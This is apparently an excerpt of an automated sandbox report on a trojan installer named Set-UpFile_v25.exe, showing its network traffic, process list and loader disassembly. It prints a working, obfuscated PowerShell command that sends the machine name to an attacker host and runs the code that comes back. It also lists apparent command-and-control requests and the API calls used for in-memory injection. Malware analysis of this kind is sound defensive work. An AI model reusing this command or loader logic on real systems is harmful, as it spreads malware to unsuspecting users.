                                                                                                                                                              2025-01-07 13:37:26 UTC15331OUTData Raw: dc 16 db 21 f3 5b 5b 3e 1c cd 90 4a b8 1f c9 51 4c af c0 5c 85 83 a2 cc 34 17 a3 4d 88 fa 73 9a 3d 6b 5e 68 61 a9 e4 48 45 41 94 a2 1e 5d 67 7c 31 65 da 93 99 bc f8 70 0b f7 ea 06 f8 9b 82 f5 28 15 12 65 d7 f0 de 10 e3 35 32 ff 3c 7e c9 ae c4 c3 d1 81 ba 7d 25 b1 ed 39 04 4f be 42 4d 69 23 14 a9 3f f9 c6 8b d1 0e 1d 83 f7 ea cc 76 5d e3 25 99 72 0d e5 df 9c d6 bd 52 28 9d b3 16 fb cd 95 8d 09 f1 5b b0 8b 76 1e 6c 5a e3 8a 6d a2 24 ad d4 ec a5 d7 4a 47 70 78 41 5b d2 9c 93 78 a6 6c 77 a5 b4 8a c0 96 6a c5 55 a8 e7 94 a8 c3 71 8f 95 63 07 e1 9d 2a a4 36 3d 72 bc 86 71 36 ba f5 e5 af 38 1f a7 43 b0 00 ee 4d 2e 0a e0 33 6d 8a a3 b7 4e 47 f0 75 18 c5 c1 53 4f b2 0c bb d0 c3 03 ba 27 a9 4d 50 d3 43 51 a7 6f 7e f1 8d 8e 44 f9 82 4e f2 8e 35 f5 a5 60 3c 31 b8 96
                                                                                                                                                              Data Ascii: ![[>JQL\4Ms=k^haHEA]g|1ep(e52<~}%9OBMi#?v]%rR([vlZm$JGpxA[xlwjUqc*6=rq68CM.3mNGuSO'MPCQo~DN5`<1
                                                                                                                                                              2025-01-07 13:37:27 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 07 Jan 2025 13:37:27 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=hat95bffjk3nan1v96ij9nlu6p; expires=Sat, 03 May 2025 07:24:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oh%2FEXAwS%2BEAQE27K4o1ka7n0I1NkWoEkwseV5yxO0P%2FeeawqPUl2PQZoLfByzWc%2Bl1Maovy5hGnq8Ej8jU6ZPzckFcTYvuJwy6RBYEAFwCe6dLn7mLkWRRHFnE%2F4yGrV%2F0oG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8fe457aa2de90f5b-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1526&min_rtt=1511&rtt_var=597&sent=205&recv=604&lost=0&retrans=0&sent_bytes=2839&recv_bytes=589055&delivery_rate=1788120&cwnd=221&unsent_bytes=0&cid=d9095516ae01d5da&ts=1617&x=0"


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              8192.168.2.449757104.21.25.524437272C:\Users\user\Desktop\Set-UpFile_v25.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2025-01-07 13:37:28 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 113
                                                                                                                                                              Host: beattalkerz.cyou
                                                                                                                                                              2025-01-07 13:37:28 UTC113OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 26 68 77 69 64 3d 43 37 37 31 46 30 30 33 35 30 46 44 30 31 37 42 33 33 36 34 32 44 41 36 30 38 39 35 36 46 46 31
                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--ZINA&j=637b55279021aab33278188cfa638397&hwid=C771F00350FD017B33642DA608956FF1
                                                                                                                                                              2025-01-07 13:37:28 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 07 Jan 2025 13:37:28 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=121s4kduq5j3p347krdgbl71fg; expires=Sat, 03 May 2025 07:24:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0eY%2Bbbzep%2BXcWgK9%2FX44fcKVSWfQ4DQPhAUu9p6sOxC3ktkiCn6MyiCtLqMO9glVmcl7jE09vMGi9wx5iDnkpiTSGM4Bqq30GGhRdPNh2%2FW2MozggA9UjVyVpf35peU%2F8ES%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8fe457b77ae15e61-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1701&min_rtt=1687&rtt_var=661&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1014&delivery_rate=1622222&cwnd=209&unsent_bytes=0&cid=889cbd62e144d111&ts=501&x=0"
                                                                                                                                                              2025-01-07 13:37:28 UTC218INData Raw: 64 34 0d 0a 69 2b 4f 32 66 65 56 56 58 78 77 4d 2f 7a 56 62 51 57 59 47 37 6c 58 54 49 78 78 58 31 43 51 63 42 67 2f 48 50 4e 6d 78 47 58 62 51 6d 4a 51 49 78 32 39 39 64 48 69 4c 52 53 68 37 4f 69 6d 79 65 72 42 47 65 79 4c 36 56 33 52 70 66 35 73 54 34 59 51 75 51 72 6e 56 68 45 6e 52 59 77 4d 7a 66 4a 63 62 4c 7a 6b 53 4a 4d 4a 33 74 56 63 2b 62 65 59 49 50 6d 4d 74 2f 51 32 6b 6e 57 4a 55 2f 73 47 4d 58 34 30 68 4b 32 78 2f 78 57 6c 30 48 55 6c 74 67 6a 79 6a 56 57 6b 36 76 56 64 70 62 79 47 30 56 4c 62 42 52 56 6e 69 6a 63 49 69 68 6a 6b 76 51 33 2b 58 56 48 55 31 48 6e 4c 4d 65 66 46 46 61 48 58 75 46 44 41 6b 61 75 55 47 36 63 78 45 0d 0a
                                                                                                                                                              Data Ascii: d4i+O2feVVXxwM/zVbQWYG7lXTIxxX1CQcBg/HPNmxGXbQmJQIx299dHiLRSh7OimyerBGeyL6V3Rpf5sT4YQuQrnVhEnRYwMzfJcbLzkSJMJ3tVc+beYIPmMt/Q2knWJU/sGMX40hK2x/xWl0HUltgjyjVWk6vVdpbyG0VLbBRVnijcIihjkvQ3+XVHU1HnLMefFFaHXuFDAkauUG6cxE
                                                                                                                                                              2025-01-07 13:37:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              9192.168.2.449758185.161.251.214437272C:\Users\user\Desktop\Set-UpFile_v25.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2025-01-07 13:37:29 UTC201OUTGET /8574262446/ph.txt HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Host: cegu.shop
                                                                                                                                                              2025-01-07 13:37:29 UTC249INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Tue, 07 Jan 2025 13:37:29 GMT
                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                              Content-Length: 329
                                                                                                                                                              Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                                                              Connection: close
                                                                                                                                                              ETag: "676c9e2a-149"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              2025-01-07 13:37:29 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                                                                              Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                                                                                              Statistics

                                                                                                                                                              CPU Usage

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Memory Usage

                                                                                                                                                              Click to jump to process

                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                              Behavior

                                                                                                                                                              Click to jump to process

                                                                                                                                                              System Behavior

                                                                                                                                                              General

                                                                                                                                                              Target ID:0
                                                                                                                                                              Start time:08:36:59
                                                                                                                                                              Start date:07/01/2025
                                                                                                                                                              Path:C:\Users\user\Desktop\Set-UpFile_v25.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\Desktop\Set-UpFile_v25.exe"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:75'060'322 bytes
                                                                                                                                                              MD5 hash:2F33775C502E7B2D60B9BFE944B46863
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:Borland Delphi
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:4
                                                                                                                                                              Start time:08:37:29
                                                                                                                                                              Start date:07/01/2025
                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
                                                                                                                                                              Imagebase:0xfa0000
                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:5
                                                                                                                                                              Start time:08:37:29
                                                                                                                                                              Start date:07/01/2025
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              Disassembly

                                                                                                                                                              Reset < >

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:1.6%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                Signature Coverage:31.6%
                                                                                                                                                                Total number of Nodes:117
                                                                                                                                                                Total number of Limit Nodes:11
                                                                                                                                                                execution_graph 11541 2980375 11542 2980383 11541->11542 11557 2980cc5 11542->11557 11544 298090e 11545 298051b GetPEB 11547 2980598 11545->11547 11546 29804d6 11546->11544 11546->11545 11560 2980a85 11547->11560 11550 29805f9 CreateThread 11551 29805d1 11550->11551 11572 2980935 GetPEB 11550->11572 11555 2980809 11551->11555 11568 2980f85 GetPEB 11551->11568 11553 29808f9 TerminateProcess 11553->11544 11554 2980a85 4 API calls 11554->11555 11555->11553 11558 2980cd2 11557->11558 11570 2980ce5 GetPEB 11557->11570 11558->11546 11561 2980a9b CreateToolhelp32Snapshot 11560->11561 11563 29805cb 11561->11563 11564 2980ad2 Thread32First 11561->11564 11563->11550 11563->11551 11564->11563 11565 2980af9 11564->11565 11565->11563 11566 2980b30 Wow64SuspendThread 11565->11566 11567 2980b5a CloseHandle 11565->11567 11566->11567 11567->11565 11569 2980653 11568->11569 11569->11554 11569->11555 11571 2980d00 11570->11571 11571->11558 11575 298098e 11572->11575 11573 29809ee CreateThread 11573->11575 11576 2981165 11573->11576 11574 2980a3b 11575->11573 11575->11574 11579 29d132a 11576->11579 11580 29d134f 11579->11580 11581 29d1439 11579->11581 11615 29d3bac 11580->11615 11591 29d2605 11581->11591 11584 29d1367 11585 29d3bac LoadLibraryA 11584->11585 11590 298116a 11584->11590 11586 29d13a9 11585->11586 11587 29d3bac LoadLibraryA 11586->11587 11588 29d13c5 11587->11588 11589 29d3bac LoadLibraryA 11588->11589 11589->11590 11592 29d3bac LoadLibraryA 11591->11592 11593 29d2628 11592->11593 11594 29d3bac LoadLibraryA 11593->11594 11595 29d2640 11594->11595 11596 29d3bac LoadLibraryA 11595->11596 11597 29d265e 11596->11597 11598 29d2673 VirtualAlloc 11597->11598 11608 29d2687 11597->11608 11600 29d26a1 11598->11600 11598->11608 11599 29d3bac LoadLibraryA 11602 29d271f 11599->11602 11600->11599 11612 29d28fa 11600->11612 11601 29d3bac LoadLibraryA 11603 29d2775 11601->11603 11602->11603 11602->11608 11619 29d39b3 11602->11619 11603->11601 11606 29d27d7 11603->11606 11603->11612 11605 29d29b8 VirtualFree 11605->11608 11606->11612 11614 29d2839 11606->11614 11647 29d1795 11606->11647 11608->11590 11609 29d2822 11609->11612 11654 29d1890 11609->11654 11612->11605 11613 29d2957 11612->11613 11613->11613 11614->11612 11623 29d2d35 11614->11623 11616 29d3bc3 11615->11616 11617 29d3bea 11616->11617 11673 29d1cb1 11616->11673 11617->11584 11620 29d39c8 11619->11620 11621 29d3a3e LoadLibraryA 11620->11621 11622 29d3a48 11620->11622 11621->11622 11622->11602 11624 29d2d70 11623->11624 11625 29d2db7 NtCreateSection 11624->11625 11626 29d2ddc 11624->11626 11646 29d33e4 11624->11646 11625->11626 11625->11646 11627 29d2e71 NtMapViewOfSection 11626->11627 11626->11646 11628 29d2e91 11627->11628 11630 29d39b3 LoadLibraryA 11628->11630 11635 29d3118 11628->11635 11636 29d3a51 LoadLibraryA 11628->11636 11628->11646 11629 29d31ba VirtualAlloc 11639 29d31fc 11629->11639 11630->11628 11631 29d39b3 LoadLibraryA 11631->11635 11632 29d32ad VirtualProtect 11633 29d3378 VirtualProtect 11632->11633 11641 29d32cd 11632->11641 11638 29d33a7 11633->11638 11634 29d31b6 11634->11629 11635->11629 11635->11631 11635->11634 11659 29d3a51 11635->11659 11636->11628 11637 29d34f2 11642 29d34fa CreateThread 11637->11642 11637->11646 11638->11637 11638->11646 11663 29d3766 11638->11663 11639->11632 11643 29d329a NtMapViewOfSection 11639->11643 11639->11646 11641->11633 11645 29d3352 VirtualProtect 11641->11645 11642->11646 11643->11632 11643->11646 11645->11641 11646->11612 11648 29d39b3 LoadLibraryA 11647->11648 11649 29d17a9 11648->11649 11650 29d3a51 LoadLibraryA 11649->11650 11653 29d17b1 11649->11653 11651 29d17c9 11650->11651 11652 29d3a51 LoadLibraryA 11651->11652 11651->11653 11652->11653 11653->11609 11655 29d39b3 LoadLibraryA 11654->11655 11656 29d18a6 11655->11656 11657 29d3a51 LoadLibraryA 11656->11657 11658 29d18b6 11657->11658 11658->11614 11660 29d3a6c 11659->11660 11662 29d3b82 11659->11662 11660->11662 11667 29d1e56 11660->11667 11662->11635 11666 29d378e 11663->11666 11664 29d3980 11664->11637 11665 29d3a51 LoadLibraryA 11665->11666 11666->11664 11666->11665 11668 29d1e9b 11667->11668 11669 29d1e75 11667->11669 11670 29d39b3 LoadLibraryA 11668->11670 11672 29d1ea8 11668->11672 11669->11668 11671 29d3a51 LoadLibraryA 11669->11671 11669->11672 11670->11672 11671->11669 11672->11662 11674 29d1cd1 11673->11674 11676 29d1db6 11673->11676 11675 29d1e56 LoadLibraryA 11674->11675 11674->11676 11675->11676 11676->11616

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 029D2D35 Relevance: 12.7, APIs: 8, Instructions: 730memorynativethreadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 029D2DCE
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,00000000), ref: 029D2E76
                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 029D31EA
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 029D329F
                                                                                                                                                                • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 029D32BC
                                                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 029D335F
                                                                                                                                                                • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 029D3392
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 029D3503
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1248616170-0
                                                                                                                                                                • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                                • Instruction ID: c0fa53418bd3ae435cdb7dc361bf85a55e8315b7a3c22874ea57dbe990de311a
                                                                                                                                                                • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                                • Instruction Fuzzy Hash: 6942AB71608341AFDB24CF28C884B6BBBE9EF88705F44896DF9899B241D730E944DF56
                                                                                                                                                                Function 02980A85 Relevance: 6.1, APIs: 4, Instructions: 100threadprocessCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 187 2980a85-2980acc CreateToolhelp32Snapshot 190 2980ba2-2980ba5 187->190 191 2980ad2-2980af3 Thread32First 187->191 192 2980af9-2980aff 191->192 193 2980b8e-2980b9d 191->193 194 2980b6e-2980b88 192->194 195 2980b01-2980b07 192->195 193->190 194->192 194->193 195->194 196 2980b09-2980b28 195->196 196->194 199 2980b2a-2980b2e 196->199 200 2980b30-2980b44 Wow64SuspendThread 199->200 201 2980b46-2980b55 199->201 202 2980b5a-2980b6c CloseHandle 200->202 201->202 202->194
                                                                                                                                                                APIs
                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,029805CB,?,00000001,?,81EC8B55,000000FF), ref: 02980AC3
                                                                                                                                                                • Thread32First.KERNEL32(00000000,0000001C), ref: 02980AEF
                                                                                                                                                                • Wow64SuspendThread.KERNEL32(00000000), ref: 02980B42
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02980B6C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1849706056-0
                                                                                                                                                                • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                • Instruction ID: f8ebec751fe0c48026dcd68206b0b4e296fd86f8ad148cdedab083881d618d5d
                                                                                                                                                                • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                • Instruction Fuzzy Hash: F0410C71A00108AFDB18DF98C890FADB7B6EF88304F14816CE6159B7A4DB34EE45CB54
                                                                                                                                                                Function 02980375 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 399threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 203 2980375-29804dd call 2980925 call 2980f25 call 29810d5 call 2980cc5 212 298090e-2980911 203->212 213 29804e3-29804ea 203->213 214 29804f5-29804f9 213->214 215 298051b-2980596 GetPEB 214->215 216 29804fb-2980519 call 2980e45 214->216 217 29805a1-29805a5 215->217 216->214 219 29805bd-29805cf call 2980a85 217->219 220 29805a7-29805bb 217->220 226 29805f9-298061a CreateThread 219->226 227 29805d1-29805f7 219->227 220->217 228 298061d-2980621 226->228 227->228 230 29808e2-298090c TerminateProcess 228->230 231 2980627-298065a call 2980f85 228->231 230->212 231->230 235 2980660-29806af 231->235 237 29806ba-29806c0 235->237 238 2980708-298070c 237->238 239 29806c2-29806c8 237->239 242 29807da-29808cd call 2980a85 call 2980925 call 2980f25 238->242 243 2980712-298071f 238->243 240 29806ca-29806d9 239->240 241 29806db-29806df 239->241 240->241 244 29806e1-29806ef 241->244 245 2980706 241->245 269 29808cf 242->269 270 29808d2-29808dc 242->270 246 298072a-2980730 243->246 244->245 249 29806f1-2980703 244->249 245->237 247 2980760-2980763 246->247 248 2980732-2980740 246->248 255 2980766-298076d 247->255 253 298075e 248->253 254 2980742-2980751 248->254 249->245 253->246 254->253 257 2980753-298075c 254->257 255->242 259 298076f-2980778 255->259 257->247 259->242 261 298077a-298078a 259->261 263 2980795-29807a1 261->263 265 29807d2-29807d8 263->265 266 29807a3-29807d0 263->266 265->255 266->263 269->270 270->230
                                                                                                                                                                APIs
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 02980618
                                                                                                                                                                • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 0298090C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateProcessTerminateThread
                                                                                                                                                                • String ID: <54
                                                                                                                                                                • API String ID: 1197810419-2608504192
                                                                                                                                                                • Opcode ID: 6cd1d1d1636f1908863831fc612a57462820193ffb17512ecce75b997a9b2fcd
                                                                                                                                                                • Instruction ID: 012e463125cc074469724305fc3152b43fc98732484d7264d9591b33d9da1b52
                                                                                                                                                                • Opcode Fuzzy Hash: 6cd1d1d1636f1908863831fc612a57462820193ffb17512ecce75b997a9b2fcd
                                                                                                                                                                • Instruction Fuzzy Hash: 7012CFB4E00219DFDB14DF98C990BADBBB2FF88304F2482A9D515AB385C735AA45CF54
                                                                                                                                                                Function 02980935 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 271 2980935-298098c GetPEB 272 2980997-298099b 271->272 273 2980a3b-2980a42 272->273 274 29809a1-29809ac 272->274 277 2980a4d-2980a51 273->277 275 29809b2-29809c9 274->275 276 2980a36 274->276 278 29809cb-29809ec 275->278 279 29809ee-2980a06 CreateThread 275->279 276->272 281 2980a62-2980a69 277->281 282 2980a53-2980a60 277->282 286 2980a0a-2980a12 278->286 279->286 284 2980a6b-2980a6d 281->284 285 2980a72-2980a77 281->285 282->277 284->285 286->276 288 2980a14-2980a31 286->288 288->276
                                                                                                                                                                APIs
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02980A01
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                • String ID: ,
                                                                                                                                                                • API String ID: 2422867632-3772416878
                                                                                                                                                                • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                • Instruction ID: c07eeefa49101a5d74a5b4a1cef08956efb0d4550e32826d324ac6cd1f9e45a7
                                                                                                                                                                • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                • Instruction Fuzzy Hash: DC41E274A00209EFDB14DF98C994BAEBBB1FF88304F248598D515AB381C771AE85CF94
                                                                                                                                                                Function 029D39B3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66libraryCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 290 29d39b3-29d39c6 291 29d39de-29d39e8 290->291 292 29d39c8-29d39cb 290->292 294 29d39ea-29d39f2 291->294 295 29d39f7-29d3a03 291->295 293 29d39cd-29d39d0 292->293 293->291 296 29d39d2-29d39dc 293->296 294->295 297 29d3a06-29d3a0b 295->297 296->291 296->293 298 29d3a0d-29d3a18 297->298 299 29d3a3e-29d3a45 LoadLibraryA 297->299 301 29d3a1a-29d3a32 call 29d4081 298->301 302 29d3a34-29d3a38 298->302 300 29d3a48-29d3a4c 299->300 301->302 306 29d3a4d-29d3a4f 301->306 302->297 303 29d3a3a-29d3a3c 302->303 303->299 303->300 306->300
